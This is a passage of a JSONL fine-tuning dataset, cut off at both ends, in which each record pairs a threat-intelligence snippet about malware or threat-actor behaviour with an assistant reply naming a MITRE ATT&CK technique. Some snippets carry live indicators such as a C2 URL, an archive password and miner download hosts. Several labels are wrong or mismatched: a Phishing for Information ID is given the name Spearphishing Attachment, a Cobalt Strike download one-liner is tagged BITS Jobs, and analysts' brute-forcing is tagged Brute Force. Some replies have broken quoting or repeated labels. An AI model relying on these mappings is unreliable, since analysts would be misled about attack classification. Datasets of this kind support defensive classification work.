SOUTHFIELD's infrastructure being taken down by law enforcement in October 2021, the REvil leak site re-emerged in April 2022 with several new victims added. GOLD SOUTHFIELD also began recruiting exclusively via their leak site using the peer-to-peer secure messaging software Tox Chat. GOLD SOUTHFIELD's affiliates distribute ransomware through a variety of means including exploit kits, scan-and-exploit attacks, publicly-accessible RDP, remote management and monitoring (RMM) servers, and backdoored software installers. As of May 2022, the group continues to operate REvil as a name-and-shame scheme and uses a leak site to post victim information and recruit affiliates" }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOWDRIFT collects and sends system information to its C2." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command." }, { "role": "assistant", "content": "T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: Launchd [T1053.004" }, { "role": "assistant", "content": "T1106 - Native API', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1053.003 - Scheduled Task/Job: Cron', 'T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This introduction of string obfuscation also suggests a development change aimed at evading detection. The header codes, filename references, and all of the operator commands were obfuscated and only decoded during execution of the KeyBoy DLL. Figure 6 shows a sampling of these strings, after decoding" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE UNION uses various tools for credential theft. In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download files onto the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts C2 content with XOR using a single byte, 0x12." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack can collect network and active connection information." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A FinFisher variant uses a custom packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA459 has a VBScript for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations, preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used to remove artifacts from victims." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet." }, { "role": "assistant", "content": "T1102.003 - One-Way Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors used Windows command shell commands to detect and avoid virtualization and analysis environments." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can identify the domain membership of a compromised host." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Patchwork payload was packed with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. Whitelists files, folders and extensions from encryption. Encrypts files on local and network storage. Customizes the name and body of the ransom note, and the contents of the background image. Exfiltrates encrypted information on the infected host to remote controllers. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can establish persistence by adding a Registry run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To establish persistence, Okrum can install itself as a new service named NtmSsvc." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can use Native API including \"CreateProcess\" \"GetProcessById\", and \"WriteProcessMemory\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has downloaded second stage malware from compromised websites." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark can download additional files from its C2 via HTTP or DNS." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic compresses the collected data with bzip2 before sending it to the C2 server." }, { "role": "assistant", "content": "T1560.002 - Archive Collected Data: Archive via Library" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to discover current NetBIOS sessions." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Business info at outsidersecurity.nl . Introducing ROADtools - The Azure AD exploration framework . 15 minute read . Over the past 1.5 years I’ve been doing quite a lot of exploration into Azure AD and how it works under the hood. So I set myself a few goals: - Provide tooling for both Red teams and Blue teams to explore all Azure AD data in an accessible way. Use asynchronous HTTP calls in Python to dump all available information in the Azure AD graph to this database. Where to get the data . Since Azure AD is a cloud service, there isn’t a way to reverse engineer how it works, or a central repository where all the data is stored that you can access. While researching Azure and looking through the requests in the Azure Portal, at some point I noticed that the portal was calling a different version of the Azure AD Graph, the 1.61-internal version. This internal version of the Azure AD graph exposes much more data than any of the official API’s that are offered by Microsoft. To create the object structure, ROADrecon uses the OData metadata definition that the Azure AD graph exposes. ROADrecon will by default pretend to be the Azure AD PowerShell module and will thus inherit its permissions to access the internal version of the Azure AD graph. Gathering all the data . The second step is data gathering, which the roadrecon gather command does. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Enumerates remote open SMB network shares" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The username appears to be attacker specified and has occurred in 2017 Bankshot samples" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has collected files from victim machines, including certificates and cookies." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Creates 2 objects in the AD forest Configuration partition. Updates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section. Pushes the updates to DCs via DrsReplicaAdd and KCC" }, { "role": "assistant", "content": "T1207 - Rogue Domain Controller" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim’s machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The SUPERNOVA webshell is an anonymous code C# webshell written in .NET C# that is specifically written for usage on SolarWinds Orion servers" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attacker deception and attribution The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists." }, { "role": "assistant", "content": "T1014 - Rootkit', 'T1574.006 - Hijack Execution Flow: LD_PRELOAD" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP as a transport to communicate with its command server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4: Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment', 'T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike’s web server, and presents a one-liner to download and run the artifact" }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These privilege escalation modules are the ones we caught when we queried for Jian’s global configuration table. We also found a couple of more Local Privilege Escalation exploits from the NtElevation series" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wingbird deletes its payload along with the payload's parent process after it finishes copying files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During our initial research into the TwoFace++ loader, we were unable to extract the embedded payload using the same brute forcing technique that we used on the initial TwoFace loader samples" }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun can detect the username of the infected host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR)." }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has modified the permissions on binaries with \"chattr\"." }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Probably full and active window screenshot quality captureActiveQC 40 CaptureSites VPN*0,0 Login*0,0 mail*0,0 Security*0,0 Window titles of interest for screenshots, using left mouse button and Enter keypress hook important upLog.txt upSCRLog.txt upSpecial.txt upFile.txt upMSLog.txt List of files to send to C2 using bitsadmin.exe from the dedicated thread maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2 Servers http://108.61.189.174 Control server HTTP URL ZipPass KtJvOXulgibfiHk Password for uploaded zip archives browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread Most of the parameters are self-explanatory" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti can utilize command line options to allow an attacker control over how it scans and encrypts files." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mapping of TG-3390's interactions with web shells during an intrusion responded to by CTU researchers" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI can delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT was distributed via malicious Word documents." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Andariel has downloaded additional tools and malware onto compromised hosts." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBK has the ability to decrypt AES encrypted payloads." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sowbug named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory \"CSIDL_APPDATA\\microsoft\\security\"." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain information on installed anti-malware programs." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used services.exe to execute scripts and executables during lateral movement within a victim network." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "created accounts disguised as legitimate backup and service accounts as well as an email administration account." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT has executed commands using \"cmd.exe /c\"." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerLess has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While sending to the C2 server, the data is formatted as follows: @{SYSINFO  = $get.ToString(); ACTION = \"REGISTER\";} Ability to take screenshots" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMould can run cmd.exe with parameters." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - 